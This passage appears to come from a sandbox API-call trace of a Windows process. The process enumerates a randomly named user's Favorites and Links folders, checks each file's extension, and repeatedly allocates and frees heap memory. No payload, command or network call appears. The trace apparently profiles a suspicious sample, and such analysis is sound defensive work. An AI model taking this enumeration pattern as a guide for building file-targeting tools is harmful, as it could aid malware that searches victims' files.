returned="C:\\" [0189.722] PathFindFileNameW (pszPath="") returned="" [0189.723] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fbc40, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0189.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.724] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fbc40, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0189.724] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fe350, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0189.724] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\desktop.ini") returned=".ini" [0189.724] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0189.724] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0189.724] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ac2b90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0189.724] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0189.724] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0189.724] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0189.724] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0189.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c60 [0189.724] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0189.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.725] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Links\\") returned="Links\\" [0189.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.725] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0189.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0189.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0189.725] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0189.725] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0189.725] PathFindFileNameW (pszPath="") returned="" [0189.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.725] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Links\\*" (normalized: "c:\\users\\keecfmwgj\\links\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0189.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.726] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0189.726] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b2df0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0189.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ee78 [0189.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.726] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Links\\desktop.ini") returned=".ini" [0189.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0189.726] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b2df0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1c7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0189.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ee78 [0189.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.727] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Links\\Desktop.lnk") returned=".lnk" [0189.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0189.727] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b2df0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x36e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0189.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ee78 [0189.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.728] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Links\\Downloads.lnk") returned=".lnk" [0189.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0189.728] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2ab6db0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x5fd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneDrive.lnk", cAlternateFileName="")) returned 1 [0189.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ee78 [0189.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.728] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Links\\OneDrive.lnk") returned=".lnk" [0189.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0189.728] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b06e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0189.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2e30 [0189.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0189.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2e30 | out: hHeap=0x2c0000) returned 1 [0189.729] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Links\\RecentPlaces.lnk") returned=".lnk" [0189.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0189.729] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b06e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0189.729] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0189.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0189.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c60 | out: hHeap=0x2c0000) returned 1 [0189.730] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0189.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40108 [0189.730] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0189.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0189.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0189.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a405d8 | out: hHeap=0x2c0000) returned 1 [0189.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0189.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0189.746] HeapFree (in: hHeap=0x2c0000, 